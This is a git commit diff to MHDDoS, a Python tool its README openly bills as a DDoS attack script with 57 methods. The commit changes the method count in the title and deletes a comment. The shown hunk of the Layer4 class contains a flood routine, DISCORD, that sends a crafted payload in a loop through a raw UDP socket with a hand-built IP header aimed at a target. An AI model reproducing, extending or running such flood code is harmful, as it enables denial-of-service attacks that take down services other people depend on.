This commit is contained in:
CirqueiraDev 2025-06-25 13:13:28 -03:00
parent 33b8bfe64e
commit e9d0e8da68
2 changed files with 2 additions and 2 deletions

View File

@ -1,4 +1,4 @@
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
<p align="center">

View File

@ -530,7 +530,7 @@ class Layer4(Thread):
Tools.safe_close(s)
def DISCORD(self) -> None:
payload = self._generate_discord() # pacote único bytes
payload = self._generate_discord()
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):